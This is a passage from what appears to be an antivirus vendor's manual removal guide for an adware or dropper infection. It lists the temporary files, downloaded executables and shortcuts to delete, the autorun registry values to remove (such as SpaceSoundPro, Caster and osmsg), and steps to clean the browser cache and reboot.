    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\AutoTime51477[1].exe (56936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ttwifi[1].exe (74423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm1F.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv1D.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (120 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk1B.tmp (74423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb7.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsmA.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\gXvDHtyh[1].exe (15904 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss15.tmp (347970 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst18.tmp (15904 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh21.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu26.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\vos_n[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl1E.tmp (56936 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@hejie123[1].txt (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\0Be10MR8[1].exe (11960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj24.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (36408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw14.tmp (15 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (88848 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\1znQuZItQ[1] (36408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (11960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Desktop\AutoTime.lnk (865 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-HH7RG.tmp\nsk1B.tmp (6356 bytes)
    %Program Files%\ttwifi\is-BMP2P.tmp (9036 bytes)
    %Program Files%\ttwifi\unins000.dat (2636 bytes)
    %Documents and Settings%\All Users\Application Data\WindowsMsg\is-JQUO0.tmp (14022 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Program Files%\ttwifi\is-IJ1PQ.tmp (14022 bytes)
    %Program Files%\ttwifi\is-6H35A.tmp (9098 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ttwifi\ttwifi.lnk (698 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\swapfile.ini (118 bytes)
    %Documents and Settings%\All Users\Desktop\ttwifi.lnk (686 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\IDH.dll (9098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-DOMJK.tmp\hp.exe (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ttwifi\UnInstall.exe.lnk (678 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SpaceSoundPro" = "%Program Files%\SpaceSoundPro\SpaceSoundPro.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Caster" = "%Program Files%\Caster\wizzcaster.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "IDSCPRODUCT" = "%Program Files%\SpaceSoundPro\idscservice.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "osmsg" = "%Documents and Settings%\All Users\Application Data\WindowsMsg\osmsg.exe /AUTORUN"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Caster" = "%Program Files%\SpaceSoundPro\wizzcaster.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
